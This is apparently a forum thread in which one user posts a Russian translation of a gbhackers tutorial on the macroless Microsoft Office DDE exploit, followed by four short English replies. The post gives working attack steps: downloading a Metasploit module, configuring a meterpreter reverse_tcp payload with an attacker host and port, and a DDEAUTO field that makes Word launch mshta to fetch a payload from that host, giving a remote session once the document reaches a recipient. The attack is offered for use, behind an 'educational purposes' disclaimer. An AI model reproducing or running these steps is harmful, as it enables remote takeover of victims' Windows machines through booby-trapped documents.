Использование Windows при помощи DDE эксплойта Microsoft Office (MACROLESS)

[Pain]

DDE экплойт также известен как динамический обмен данными, позволяет передавать данные между приложениями без какого-либо взаимодействия с пользователем. Хакеры использовали этот метод для запуска вредоносных скриптов с целью взлома системы.

Об этом в Microsoft сообщали такие службы, как Sensepost, Etienne Stalmans, и Saif El-Sherei, но он не был исправлен, поскольку многие приложения используют протокол DDE. Этот эксплойт не требует включения макрофункции.

Необходимые условия – DDE exploit

• Машина использующая операционную систему Windows
• Microsoft Office (любая версия)
• KALI LINUX

Мы вынуждены будем импортировать Metasploit эксплойт.
Загрузите его из GitHub с помощью командного терминала.

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Отправьте скрипт в местоположение Metasploit

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Теперь наберите msfconsole на терминале, который запускает Metasploit framework, а затем наберите reload_all, чтобы загрузить модули.

Этот эксплойт использует функцию dde, чтобы поставить hta payload. А теперь наберите

use exploit/windows/dde_delivery

затем установите хост сервера, используя следующую команду:

set SRVHOST 192.168.177.141

мы должны установить прослушиватель payload. Не используйте порт 8080, поскольку порт сервера установлен по умолчанию на 8080.

1. установите PAYLOAD windows/meterpreter/reverse_tcp
2. установите LHOST 192.168.177.141
3. установите LPORT 6708
4. эксплойт

Теперь вставьте код в любой документ word. Мы использовали полностью обновленный office 365 pro plus. Разместите формулу, и у вас должно быть небольшое поле ошибки в документе, а затем щелкните правой кнопкой мыши по коду. Вставьте команду в документ между цветными скобками. Сохраните документ.

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}

После отправки документа получателю у вас откроется сессия измерителя.

Отказ от ответственности

Эта статья предназначена только для образовательных целей. Любые действия и/или деятельность, связанные с материалом, содержащимся на этом веб-сайте, будут рассматриваться исключительно в зоне действия вашей ответственности. Нелегальное использование информации на этом веб-сайте может привести к уголовным обвинениям, выдвинутым против соответствующих лиц. Авторы и www.gbhackers.com не будут нести ответственность в случае возбуждения уголовного обвинения против любых лиц, злоупотребляющих информацией на этом веб-сайте, с целью нарушения закона.


Источник: Exploiting Windows Using Microsoft Office DDE Exploit (MACROLESS)

 

[qwasder]

"Hey, I'll be honest, this is some wild stuff. As far as I know, DDE exploits are super outdated, but if you're looking to learn more about old-school vulnerabilities, I'd recommend checking out some retro hacking blogs. Anyone have experience with this?"

 

[Галина55]

Honestly, not my cup of tea, messing with Office exploits to run arbitrary code on Windows. This seems like a niche topic and not something I'd use in production. Can someone translate the thread title and explain what they're trying to achieve here?

 

[ds007]

I'm not really sure what's going on with this DDE exploit, but I thought it was mostly patched already? Can someone confirm if this still works with the latest Office updates?

 

[k1234576]

"Dude, I'm not touching this with a 10-foot pole, don't know if it's legit or a honeypot. Also, isn't this more of a Windows exploit? Would love to see some more info on how this pertains to crypto or tech in general."